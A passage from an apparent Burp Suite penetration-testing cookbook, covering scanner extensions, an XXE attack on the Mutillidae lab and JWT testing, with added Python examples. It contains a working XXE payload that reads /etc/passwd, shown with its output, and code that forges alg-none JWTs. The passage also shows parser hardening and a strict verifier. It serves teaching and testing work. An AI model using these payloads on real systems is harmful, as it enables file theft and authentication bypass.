attack where the attacker can decrypt and modify traffic from the attacked 
client and server. Reported by KIKU... 


How it works... 


Burp functionality can be extended through a PortSwigger API to create custom 
extensions, also known as plugins. In this recipe, we installed two plugins that 
assist with identifying older versions of software contained in the application 
with known vulnerabilities. 
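A passive check of the kind these plugins perform, turning a version-disclosing Server header into findings. This is an added example, not the Retire.js, Vulners or Manual Scan Issues code; the sample banner is constructed from the tokens legible in this chapter's screenshots, and the vulnerability table holds only the OpenSSL entry the Vulners plugin reported above.

```python
"""Added example (not the plugins' code): a passive check that reports
version disclosure in the Server header and matches the disclosed versions
against a vulnerability table."""
import re

# Constructed sample: the product tokens are those seen in the chapter's
# screenshots; the rest of the banner is assumed for the example.
SAMPLE_URL = "http://192.168.56.101/mutillidae/"
SAMPLE_HEADERS = {
    "Server": "Apache mod_ssl OpenSSL/0.9.8k Phusion_Passenger/4.0.30 "
              "mod_perl/2.0.4 Perl/v5.10.1",
    "Content-Type": "text/html",
}

# product/version or product/vVersion tokens, e.g. OpenSSL/0.9.8k, Perl/v5.10.1
TOKEN_RE = re.compile(r"([A-Za-z][\w.+-]*)/v?(\d+(?:\.[\w-]+)*)")

# Constructed lookup limited to the entry the Vulners plugin reported in the
# recipe (cve, cvss, severity, summary); a real check queries a feed instead.
KNOWN_VULNERABLE = {
    ("openssl", "0.9.8k"): [
        ("CVE-2014-0224", "6.8", "High",
         "An attacker can force the use of weak keying material in OpenSSL "
         "SSL/TLS clients and servers (MITM)."),
    ],
}


def parse_server_header(banner):
    """Return the (product, version) pairs disclosed by a Server banner."""
    return [(m.group(1), m.group(2)) for m in TOKEN_RE.finditer(banner)]


def check_server_header(headers, url):
    """Run the passive check over one response's headers and return issues in
    the shape the Manual Scan Issues dialog asks for."""
    components = parse_server_header(headers.get("Server", ""))
    issues = []
    if components:
        issues.append({
            "name": "Information Leakage in Server Response",
            "severity": "Low", "confidence": "Certain", "url": url,
            "detail": "The Server header discloses "
                      + ", ".join(f"{p} {v}" for p, v in components) + ".",
            "remediation": "Suppress product versions in the Server header "
                           "(on Apache: ServerTokens Prod and ServerSignature Off).",
        })
    for product, version in components:
        for cve, cvss, severity, summary in KNOWN_VULNERABLE.get(
                (product.lower(), version), []):
            issues.append({
                "name": "Vulnerable Software detected",
                "severity": severity, "confidence": "Firm", "url": url,
                "detail": f"{product} {version}: {cve} (CVSS {cvss}) - {summary}",
                "remediation": f"Upgrade {product} to a release that fixes {cve}.",
            })
    return issues


if __name__ == "__main__":
    for issue in check_server_header(SAMPLE_HEADERS, SAMPLE_URL):
        print(f"[{issue['severity']}] {issue['name']}: {issue['detail']}")
```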


Creating new issues via the Manual-Scan Issues Extension 


Though Burp provides a listing of many security vulnerabilities commonly 
found in web applications, occasionally you will identify an issue and need to 
create a custom scan finding. This can be done using the Manual-Scan 
Issues Extension. 


Note: This plugin requires the Burp Professional edition. 


Getting ready 


Using the OWASP Mutillidae II application, we will add the Manual Scan Issues 
Extension, create steps revealing a finding, then use the extension to create a 
custom issue. 


How to do it... 


1. Switch to the Burp Extender tab. Go to the BApp Store and find the plugin 
labeled Manual Scan Issues. Click the Install button: 


[Screenshot: BApp Store list (Name, Installed, Rating, Popularity, Last updated, Detail) including JSON Decoder, JSON Web Token Attacker, JSON Web Tokens, JSWS Parser, JVM Property Editor, Kerberos Authentication, Lair, Length Extension Attacks, LightBulb WAF Auditing Framework and Logger++] 


2. Return to the Firefox browser and browse to the Mutillidae homepage. 

3. Switch to the Burp Proxy | HTTP history tab and find the request you just 
made browsing to the homepage. Click the Response tab. Note the overly 
verbose Server header indicating the web server type and version along 
with the operating system and programming language used. This 
information can be used by an attacker to fingerprint the technology stack 
and identify vulnerabilities that can be exploited: 


[Screenshot: Response tab, Raw view] 

HTTP/1.1 200 OK 
Date: Thu, 13 Sep 2018 15:55:03 GMT 
Server: ... Phusion_Passenger/4.0.30 mod_perl/... Perl/v5.10.1 
Expires: Mon, 26 Jul 1997 05:00:00 GMT 
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, no-cache="set-cookie" 
Pragma: no-cache 
Logged-In-User: 
X-FRAME-OPTIONS: DENY 
Last-Modified: Thu, 13 Sep 2018 15:55:03 GMT 
Vary: Accept-Encoding 
Content-Length: 45734 
Connection: close 
Content-Type: text/html 


4. Since this is a finding, we need to create a new issue manually to capture it 
for our report. While viewing the Request, right-click and select Add Issue 
(the menu item the extension adds), as follows: 


(Screenshot: the Request pane with the right-click context menu open. Add 
Issue appears alongside the standard items: Send to Intruder, Send to Repeater, 
Send to Sequencer, Send to Comparer, Send to Decoder, Show response in browser 
and Request in browser.) 

5. A pop-up dialog box appears. Within the General tab, give the new issue the 
name Information Leakage in Server Response. Fill in the issue detail, 
background, and remediation fields as well: whatever you type here is what ends 
up in the report, so list the disclosed versions and recommend suppressing the 
banner (for Apache, ServerTokens Prod), as follows: 


(Screenshot: the ManScanAdd dialog, General tab, with HTTP Request and HTTP 
Response tabs alongside. Fields: the issue name, set to Information Leakage in 
Server Response; Issue Detail; Issue Background; Remediation Background; 
Remediation Detail; and URL (path = http://domain/path), pre-filled with 
http://192.168.56.101:80/mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0.) 


6. If we flip to the HTTP Request tab, we can copy and paste into the text area 
the contents of the Request tab found within the message editor, as follows: 


HTTP Request: 

GET /mutillidae/index.php?page=home.php&popUpNotificationCode=HPH0 HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=login.php&popUpNotificationCode=LOU1 
Cookie: showhints=0; PHPSESSID=vyv6rh7ueelvarm6rfbg65iph3; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 


7. If we flip to the HTTP Response tab, we can copy and paste into the text 
area the contents of the Response tab found within the message editor. 

8. Once completed, flip back to the General tab and click the Import Finding 
button. You should see the newly-created scan issue added to the Issues 
window, as follows. Review the severity before you import: a version banner 
on its own is normally rated Low or Informational rather than High as shown 
here, and the rating you choose is what the report will carry: 


(Screenshot: the Issues pane now lists Cleartext submission of password and 
the new Information Leakage in Server Response. Its Advisory tab, next to the 
Request and Response tabs, reads:) 

Issue: Information Leakage in Server Response 
Severity: High 
Confidence: Certain 
Host: http://192.168.56.101 
Path: /mutillidae/index.php 

Note: This issue was generated by a Burp extension. 

Issue detail: Enter Issue Detail... 
Remediation detail: Enter Remediation Detail... 
Issue background: Enter Issue Background... 
Remediation background: Enter Remediation Background... 


How it works... 


In cases where an issue is not available within Burp's core issue list, a tester 
can create their own issue using the Manual Scan Issues extension. In this 
recipe, we created an issue for information leakage in server responses. The 
entry is a first-class scan issue, so it is exported with the rest of the 
findings when you generate a report. 


See also 


For a listing of all issue definitions identified by Burp, go 
to https://portswigger.net/kb/issues. 
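
The finding recorded above is also easy to check for programmatically, which 
helps when you want the same call made on every response in a large history 
export rather than by eye. The following Python is an added example, not code 
from the book or from the Manual Scan Issues extension. The sample response is 
constructed: only the Phusion_Passenger and Perl fragments come from the 
screenshot, the rest of the banner and the X-Powered-By line are made up, and 
the list of banner headers to inspect is a judgement call. 

```python
import re
from typing import Dict, List

# Response headers that routinely carry product/version banners (assumed list;
# extend it for stacks you meet in practice).
BANNER_HEADERS = ("server", "x-powered-by", "x-aspnet-version",
                  "x-aspnetmvc-version", "x-generator")

# "Product/1.2.3" or "Perl/v5.10.1": a product name, a slash, then a dotted version.
VERSION_RE = re.compile(r"[A-Za-z_][\w.-]*/v?\d+(?:\.\d+)+")

# Constructed sample. Phusion_Passenger/4.0.30 and Perl/v5.10.1 are visible in the
# recipe's screenshot; the remaining banner text and X-Powered-By are invented.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 13 Sep 2018 15:55:03 GMT\r\n"
    "Server: Apache/2.2.14 (Ubuntu) mod_perl/2.0.4 Perl/v5.10.1 Phusion_Passenger/4.0.30\r\n"
    "X-Powered-By: PHP/5.3.2-1ubuntu4.30\r\n"
    "X-FRAME-OPTIONS: DENY\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html>...</html>"
)


def parse_headers(raw_response: str) -> Dict[str, List[str]]:
    """Split a raw HTTP response, as shown in Burp's Raw tab, into {name: [values]}.

    Names are lower-cased so lookups are case-insensitive (X-FRAME-OPTIONS vs
    X-Frame-Options); repeated headers are kept as a list rather than overwritten.
    """
    separator = "\r\n\r\n" if "\r\n\r\n" in raw_response else "\n\n"
    head = raw_response.split(separator, 1)[0]
    headers: Dict[str, List[str]] = {}
    for line in head.splitlines()[1:]:  # element [0] is the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def find_banner_leaks(raw_response: str) -> List[Dict[str, object]]:
    """One finding per banner header that discloses at least one product version."""
    findings: List[Dict[str, object]] = []
    headers = parse_headers(raw_response)
    for name in BANNER_HEADERS:
        for value in headers.get(name, []):
            versions = VERSION_RE.findall(value)
            if versions:
                findings.append({"header": name, "value": value, "versions": versions})
    return findings


if __name__ == "__main__":
    for finding in find_banner_leaks(SAMPLE_RESPONSE):
        print(f"{finding['header']}: {', '.join(finding['versions'])}")
```

A header that names the product without a version (Server: Apache) is 
deliberately not reported; the versions are what make the banner useful to an 
attacker. 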


Working with the Active Scan++ 
Extension 


Some extensions assist in finding vulnerabilities that need specific payloads, 
such as XML injection, or help to find hidden issues, such as cache poisoning 
and DNS rebinding. In this recipe, we will add an active scanner extension 
called Active Scan++, which adds checks for these more specialized 
vulnerabilities. 


Note: This plugin requires the Burp Professional edition. 


Getting ready 


Using the OWASP Mutillidae II application, we will add the Active Scan++ 
extension, and then run an active scan against the target. 


How to do it... 


1. Switch to the Burp Extender | BApp Store and select the Active Scan++ 
extension. Click the Install button to install the extension, as follows: 


(Screenshot: Extender | BApp Store, showing the listing with Name, Installed, 
Rating, Popularity, Last updated and Detail columns.) 


2. Return to the Firefox browser and browse to the Mutillidae homepage. 


3. Switch to the Burp Target tab, then the Site map tab, right-click on the 
mutillidae folder, and select Actively scan this branch, as follows: 


(Screenshot: the Site map with http://192.168.56.101/mutillidae selected and 
its context menu open; the menu includes Remove from scope, Spider this branch 
and Actively scan this branch.) 


4. When the Active scanning wizard appears, you may leave the default 
settings and click the Next button, as follows: 


(Screenshot: the Active scanning wizard.) 

You have selected 204 items for active scanning. Before continuing, you can use 
the filters below to remove certain categories of items, to make your scanning 
more targeted and efficient. 

Remove duplicate items (same URL and parameters) [112 items] 
Remove items already scanned (same URL and parameters) [156 items] 
Remove out-of-scope items [0 items] 
Remove items with no parameters [67 items] 
Remove items with media responses [4 items] 
Remove items with the following extensions [45 items]: js, gif, jpg, png, css 

Note: Some of the selected items do not yet have responses. If you choose to 
remove items with media responses, some of these items may be removed from the 
scan when their responses have been analyzed. 


Follow the prompts and click OK to begin the scanning process. 


5. After the active scanner completes, browse to the Issues window. Make 
note of any additional issues found by the newly-added extension. You can 
always tell which ones the extension found by looking for the This issue 
was generated by the Burp extension: Active Scan++ message, as follows: 


(Advisory tab for Arbitrary host header accepted, with a Compare responses tab 
alongside) 

Issue: Arbitrary host header accepted 
Severity: Low 
Confidence: Certain 
Host: http://192.168.56.101 
Path: /mutillidae/index.php 

Note: This issue was generated by the Burp extension: Active Scan++. 

Issue detail 

The application appears to be accessible using arbitrary HTTP Host headers. 

This is a serious issue if the application is not externally accessible or uses 
IP-based access restrictions. Attackers can use DNS Rebinding to bypass any IP 
or firewall based access restrictions that may be in place, by proxying through 
their target's browser. 

Note that modern web browsers' use of DNS pinning does not effectively prevent 
this attack. The only effective mitigation is server-side: 
https://bugzilla.mozilla.org/show_bug.cgi?id=689835#c13 

Additionally, it may be possible to directly bypass poorly implemented access 
restrictions by sending a Host header of 'localhost'. 


How it works... 


Burp's functionality can be extended beyond its core checks with the use of 
extensions. In this recipe, we installed a plugin that extends the Active 
Scanner to identify additional issues such as the arbitrary Host header 
acceptance seen here. That finding matters most when the application sits 
behind a reverse proxy or uses the Host value for access control, password 
reset links or cache keys; confirm it by replaying the request with a Host you 
control and checking that the same content comes back. 


Implementing Advanced Topic 
Attacks 


In this chapter, we will cover the following recipes: 


Performing XML External Entity (XXE) attacks 

Working with JSON Web Token (JWT) 

Using Burp Collaborator to determine Server-Side Request Forgery (SSRF) 

Testing Cross-Origin Resource Sharing (CORS) 

Performing Java deserialization attacks 


Introduction 


This chapter covers intermediate to advanced topics such as working with JWT, 
XXE, and Java deserialization attacks, and how to use Burp to assist with such 
assessments. For some of these attacks, Burp plugins do much of the heavy 
lifting for the tester. 


Software tool requirements 


In order to complete the recipes in this chapter, you will need the following: 


• OWASP Broken Web Applications (BWA) 
• OWASP Mutillidae II 
• Burp Proxy Community or Professional (https://portswigger.net/burp/) 


Performing XXE attacks 


XXE is a vulnerability in applications that parse XML. An attacker who 
controls the XML input can declare an external entity whose SYSTEM identifier 
points at a local file or a URL, then reference that entity in the document 
body. A weakly-configured parser resolves the entity, so the file contents (or 
the response from the URL) are read into the document and, in the common case, 
echoed back to the attacker. 


Getting ready 


Using the OWASP Mutillidae II XML validator page, determine whether the 
application is susceptible to XXE attacks. 


How to do it... 


1. Navigate to the XML External Entity Injection page, that is, through Others 
| XML External Entity Injection | XML Validator: 


(Screenshot: Mutillidae's XML Validator page at 
http://192.168.56.101/mutillidae/index.php?page=xml-validator.php, reached 
through Others | XML External Entity Injection | XML Validator. The form is 
labelled Please Enter XML to Validate and is pre-populated with 
<somexml><message>Hello World</message></somexml>.) 


2. While on the XML Validator page, submit the example XML that is provided 
on the page by clicking the Validate XML button: 


XML Validator 

Please Enter XML to Validate 
Example: <somexml><message>Hello World</message></somexml> 

XML Submitted 
<somexml><message>Hello World</message></somexml> 

Text Content Parsed From XML 
Hello World 


3. Switch to the Burp Proxy | HTTP history tab and look for the request you 
just submitted to validate the XML. Right-click and send the request to 
Repeater: 


(Screenshot: the HTTP history entry with its context menu: Send to Spider, Do 
an active scan, Do a passive scan, Send to Intruder, and so on. The request 
reads:) 

GET /mutillidae/index.php?page=xml-validator.php&xml=%09%3Csomexml%3E%3Cmessage%3EHello+World%3C%2Fmessage%3E%3C%2Fsomexml%3E+&xml-validator-php-submit-button=Validate+XML HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=xml-validator.php&xml=%3C%3Fxml+version%3D%271 (cut off in the screenshot) 


4. Note the value provided in the xml parameter: 


(Repeater request pane) 

GET /mutillidae/index.php?page=xml-validator.php&xml=%09%3Csomexml%3E%3Cmessage%3EHello+World%3C%2Fmessage%3E%3C%2Fsomexml%3E+&xml-validator-php-submit-button=Validate+XML HTTP/1.1 
Host: 192.168.56.101 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.56.101/mutillidae/index.php?page=xml-validator.php&xml=(a previously submitted, URL-encoded XXE payload: a DOCTYPE declaring systemEntity SYSTEM "../../../../etc/passwd" and referencing it inside <change-log><text>) 
Cookie: showhints=1; PHPSESSID=deudlotk7fvq2ihtlpe449irol; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada 
Connection: close 
Upgrade-Insecure-Requests: 1 


5. Use Burp Proxy Interceptor to replace this XML parameter value with the 
following payload. This new payload will make a request to a file on the 
operating system that should be restricted from view, namely, the 
/etc/passwd file: 


<?xml version="1.0"?> 
<!DOCTYPE change-log [ 
<!ENTITY systemEntity SYSTEM 
"../../../../etc/passwd"> 
]> 
<change-log> 
<text>&systemEntity;</text> 
</change-log> 


Since the new XML message contains characters that have their own meaning in 
a URL (angle brackets, quotes, the ampersand in &systemEntity; and spaces), 
let's type this payload into the Decoder section and URL-encode it before we 
paste it into the xml parameter. 


6. Switch to the Decoder section, type or paste the new payload into the text 
area. Click the Encode as... button and select the URL option from the 
drop-down listing. Then, copy the URL-encoded payload using Ctrl + C. 
Make sure you copy all of the payload by scrolling to the right: 


(Screenshot: the Decoder tab with the payload in the upper pane and its fully 
URL-encoded form, every byte as %xx, in the lower pane.) 


7. Switch to the Burp Proxy Intercept tab. Turn the interceptor on with the 
Intercept is on button. 

8. Return to the Firefox browser and reload the page. As the request is paused, 
replace the current value of the xml parameter with the new URL-encoded 
payload: 


(Screenshot: Proxy | Intercept with Intercept is on, showing the paused GET 
request to http://192.168.56.101:80 with the xml parameter value replaced by 
the URL-encoded payload.) 


9. Click the Forward button. Turn the interceptor off by toggling the button to 
Intercept is off. 
10. Note that the returned XML now shows the contents of the /etc/passwd 
file! The XML parser resolved our external entity and read /etc/passwd from 
the server's filesystem: 


Please Enter XML to Validate 
Example: <somexml><message>Hello World</message></somexml> 

XML Submitted 
<?xml version="1.0"?> <!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "../../../../etc/passwd"> ]> <change-log> <text>&systemEntity;</text> </change-log> 

Text Content Parsed From XML 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh 
mail:x:8:8:mail:/var/mail:/bin/sh 
news:x:9:9:news:/var/spool/news:/bin/sh 
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh 
proxy:x:13:13:proxy:/bin:/bin/sh 
www-data:x:33:33:www-data:/var/www:/bin/sh 
backup:x:34:34:backup:/var/backups:/bin/sh 
list:x:38:38:Mailing List Manager:/var/list:/bin/sh 
irc:x:39:39:ircd:/var/run/ircd:/bin/sh 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh 
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh 
libuuid:x:100:101::/var/lib/libuuid:/bin/sh 
syslog:x:101:102::/home/syslog:/bin/false 
klog:x:102:103::/home/klog:/bin/false 
mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false 
landscape:x:104:122::/var/lib/landscape:/bin/false 
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin 
postgres:x:106:109:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash 
messagebus:x:107:114::/var/run/dbus:/bin/false 
tomcat6:x:108:115::/usr/share/tomcat6:/bin/false 
user:x:1000:1000:user,,,:/home/user:/bin/bash 
polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false 
haldaemon:x:110:119:Hardware abstraction layer,,,:/var/run/hald:/bin/false 
pulse:x:111:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false 
postfix:x:112:123::/var/spool/postfix:/bin/false 


How it works... 


In this recipe, the insecure XML parser resolves the external entity declared 
in the request, which points at the /etc/passwd file on the server. Because the 
parser is configured to fetch external entities and the application does no 
validation of the submitted DTD, the file contents are returned to the attacker 
in the parsed output. The fix is parser configuration rather than input 
filtering: disable DTD processing, or at the very least external entity 
resolution, in the XML library the application uses. 
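
To see both sides of this, the following Python is an added example (not code 
from the book or from Mutillidae) that parses the recipe's payload with the 
standard library's expat bindings twice: once configured to fetch SYSTEM 
entities, which is the weak configuration the validator page exhibits, and once 
rejecting any DOCTYPE, which is the fix. A temporary file stands in for 
/etc/passwd so the example runs anywhere. 

```python
import os
import tempfile
import xml.parsers.expat as expat


def parse_xml(data: bytes, resolve_external_entities: bool) -> str:
    """Return the character data of `data`, the way the validator page echoes it back.

    resolve_external_entities=True reproduces the weak configuration: SYSTEM entities
    are read from wherever the document points. False is the hardened configuration:
    any DOCTYPE is rejected, so no entity (internal or external) can be declared.
    """
    parser = expat.ParserCreate()
    text = []
    parser.CharacterDataHandler = text.append

    if resolve_external_entities:
        def external_entity_ref(context, base, system_id, public_id):
            # Vulnerable: the document chooses the path, the parser reads it. The child
            # parser inherits our handlers, so the file's text lands in `text`.
            child = parser.ExternalEntityParserCreate(context)
            with open(system_id, "rb") as f:
                child.Parse(f.read(), True)
            return 1
        parser.ExternalEntityRefHandler = external_entity_ref
    else:
        def reject_doctype(name, system_id, public_id, has_internal_subset):
            raise ValueError("DOCTYPE not allowed in untrusted XML")
        parser.StartDoctypeDeclHandler = reject_doctype

    parser.Parse(data, True)
    return "".join(text)


def xxe_payload(target_file: str) -> bytes:
    """Same shape as the recipe's payload, with an absolute path in place of ../../.."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE change-log [ <!ENTITY systemEntity SYSTEM "{target_file}"> ]>\n'
        "<change-log><text>&systemEntity;</text></change-log>"
    ).encode()


def demo():
    """Constructed stand-in for /etc/passwd: a temp file the client must never see.

    Returns (text leaked by the weak parser, error raised by the hardened parser).
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
        secret_path = f.name
    try:
        payload = xxe_payload(secret_path)
        leaked = parse_xml(payload, resolve_external_entities=True)
        try:
            parse_xml(payload, resolve_external_entities=False)
            blocked = None
        except ValueError as exc:
            blocked = str(exc)
        return leaked, blocked
    finally:
        os.unlink(secret_path)


if __name__ == "__main__":
    leaked, blocked = demo()
    print("weak parser returned:", leaked.strip())
    print("hardened parser said:", blocked)
```

Leaving ExternalEntityRefHandler unset is already enough to stop expat from 
following SYSTEM entities; refusing the DOCTYPE as well also shuts out 
internal-entity expansion attacks (billion laughs), which is why wrappers such 
as defusedxml default to that stricter stance. 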


Working with JWT 


As more sites provide client API access, JWTs are commonly used for 
authentication and authorization. These tokens carry identity and claims 
information describing what the bearer may access on the target site. 
Web-penetration testers need to read these tokens and determine whether their 
signatures and claims are checked properly. Fortunately, there are some handy 
plugins that make working with JWTs inside Burp much easier. We will learn 
about these plugins in this recipe. 


Getting ready 


In this recipe, we need to generate JWTs, so we will use a OneLogin developer 
account for this task. Browse to the OneLogin website: 
https://www.onelogin.com/. Click the Developers link at the top and then click 
the GET A DEVELOPER ACCOUNT link (https://www.onelogin.com/developer-signup). 

After you sign up, you will be asked to verify your account and create a 
password. Please perform these account setup tasks prior to starting this recipe. 


Using the OneLogin SSO account, we will use two Burp extensions to examine 
the JWT tokens assigned as authentication by the site. 


How to do it... 


1. Switch to Burp BApp Store and install two plugins—JSON Beautifier and 
JSON Web Tokens: 


(Screenshot: Extender | BApp Store. Nearby entries in the listing include Java 
Serial Killer, Java Serialized Payloads, JCryption Handler and JSON Decoder; 
the two to install are JSON Beautifier and JSON Web Tokens.) 


2. In the Firefox browser, go to your OneLogin page. The URL will be 
specific to the developer account you created. Log in to the account using 
the credentials you established when you set up the account before 
beginning this recipe: 


(Screenshot: the OneLogin login page at 
https://sunshine-solutions-llc-dev.onelogin.com/login2/ with a Username field, a 
Continue button and a Forgot Password link.) 

3. Switch to the Burp Proxy | HTTP history tab. Find the POST request with 
the URL /access/auth. Right-click and click the Send to Repeater option. 
4. Your Host value will be specific to the OneLogin account you set up: 


(Screenshot: the HTTP history entry for POST /access/auth and its response: 
HTTP/1.1 200 OK, Cache-Control: max-age=0, private, must-revalidate, 
Content-Type: application/json; charset=utf-8, Date: Fri, 14 Sep 2018 10:38:10 
GMT, an ETag, X-Content-Type-Options: nosniff, an X-Correlation-Id and 
X-Frame-Options: SAMEORIGIN.) 

5. Switch to the Repeater tab and notice that you have two additional tabs 
relating to the two extensions you installed. Notice also that the same token 
appears three times in this one request: in the JSON body, in the Referer 
header and inside an analytics cookie. Tokens that travel in URLs and 
third-party cookies are exposed to browser history, proxies and the analytics 
vendor, which is worth a note of its own: 


(Repeater request pane. The Raw, Params, Headers and Hex tabs are joined by 
JSON Beautifier and JSON Web Tokens. The token's header segment 
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 decodes to {"alg":"HS256","typ":"JWT"}; 
the claims and signature segments are not legible in the screenshot.) 

POST /access/auth HTTP/1.1 
Host: sunshine-solutions-llc-dev.onelogin.com 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0 
Accept: application/json 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: https://sunshine-solutions-llc-dev.onelogin.com/login2/?return=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.<claims>.<signature> 
content-type: application/json 
origin: https://sunshine-solutions-llc-dev.onelogin.com 
Content-Length: 280 
Cookie: sub_session_onelogin.com=<session cookie>; subdomain=sunshine-solutions-llc-dev; plus _ga, _gid, onelogin.com_user and a Mixpanel cookie whose initial_referrer field embeds the same return token 
Connection: close 

{"return": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.<claims>.<signature>"} 


6. Click the JSON Beautifier tab to view the JSON structure in a more 
readable manner: 


(JSON Beautifier tab) 

{ 
    "return": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.<claims>.<signature>" 
} 


7. Click the JSON Web Tokens tab to reveal a debugger very similar to the 
one available at https://jwt.io. This plugin decodes the header and claims and 
lets you tamper with the signing algorithm and signature to test how strictly 
the server verifies the token. For example, in the following screenshot, notice 
how you can select the Alg None Attack and set the algorithm to nOnE (the mixed 
case defeats verifiers that only block the literal string none) in order to 
create an unsigned token to place into the request: 


(Screenshot: the JSON Web Tokens tab. The decoded claims read:) 

{ 
    "aud": "ACCESS", 
    "iss": "MONORAIL", 
    "uri": "https://sunshi (cut off in the screenshot) 
    "method": "get", 
    "exp": 1536919440, 
    "params": {} 
} 

[exp] Expired check failed - Fri Sep 14 10:04:00 UTC 2018 

(Options on the right: Do not automatically modify signature; Recalculate 
Signature; Keep original signature; Sign with random key pair, with a 
Secret/Key for Signature recalculation box; Alg None Attack, with Alg set to 
nOnE; CVE-2018-0114 Attack, with a button to copy the public and private key 
used in the CVE attack to the clipboard.) 


How it works... 


Two extensions, JSON Beautifier and JSON Web Tokens, help testers work with 
JWTs by providing debugger tools directly inside the Burp UI. The checks worth 
running on every token are: does the server accept alg none, does it accept a 
token re-signed with a guessable HMAC secret, does it still accept the token 
after exp has passed, and does it accept a key supplied in the token's own 
header (the CVE-2018-0114 attack)? The extension automates the first and the 
last; the others you can try by editing the token in Repeater. 
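
The manipulations the JSON Web Tokens tab offers are simple enough to script, 
and doing so makes the server-side mistake they exploit obvious. The following 
Python is an added example, not the extension's code and not OneLogin's: it 
decodes a token, forges the alg none variant, and contrasts a verifier that 
trusts the token's alg field with one that does not. The claims are taken from 
the recipe's screenshot (the uri value is an assumption, since it is cut off 
there) and LAB_KEY is a made-up secret, because OneLogin's real signing key is 
unknown. 

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Any, Dict, Optional

# Made-up lab secret; OneLogin's real HS256 key is not known to us.
LAB_KEY = b"lab-secret-not-onelogins"

# Claims from the recipe's screenshot; "uri" is assumed because it is cut off there.
SAMPLE_CLAIMS = {
    "aud": "ACCESS",
    "iss": "MONORAIL",
    "uri": "https://sunshine-solutions-llc-dev.onelogin.com/login2/",
    "method": "get",
    "exp": 1536919440,
    "params": {},
}


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> Dict[str, Any]:
    """What the JSON Web Tokens tab shows: header and claims are base64url, not encrypted."""
    header_b64, payload_b64, signature_b64 = token.split(".")
    return {"header": json.loads(b64url_decode(header_b64)),
            "payload": json.loads(b64url_decode(payload_b64)),
            "signature": b64url_decode(signature_b64)}


def encode_jwt(header: Dict[str, Any], payload: Dict[str, Any], key: Optional[bytes]) -> str:
    """HS256 when a key is given; an empty signature segment for alg none."""
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    if key is None or str(header.get("alg", "")).lower() == "none":
        return signing_input + "."
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def forge_alg_none(token: str, **new_claims: Any) -> str:
    """The extension's Alg None Attack: drop the signature, edit any claims you like.
    The mixed-case nOnE slips past verifiers that only reject the exact string 'none'."""
    parts = decode_jwt(token)
    header = dict(parts["header"], alg="nOnE")
    payload = dict(parts["payload"], **new_claims)
    return encode_jwt(header, payload, None)


def verify_naive(token: str, key: bytes) -> Optional[Dict[str, Any]]:
    """Broken verifier: lets the token decide how it is verified."""
    parts = decode_jwt(token)
    alg = str(parts["header"].get("alg", ""))
    if alg.lower() == "none":
        return parts["payload"]            # accepts an unsigned token
    if alg == "HS256":
        header_b64, payload_b64, _ = token.split(".")
        expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, parts["signature"]):
            return parts["payload"]
    return None


def verify_strict(token: str, key: bytes, expected_alg: str = "HS256",
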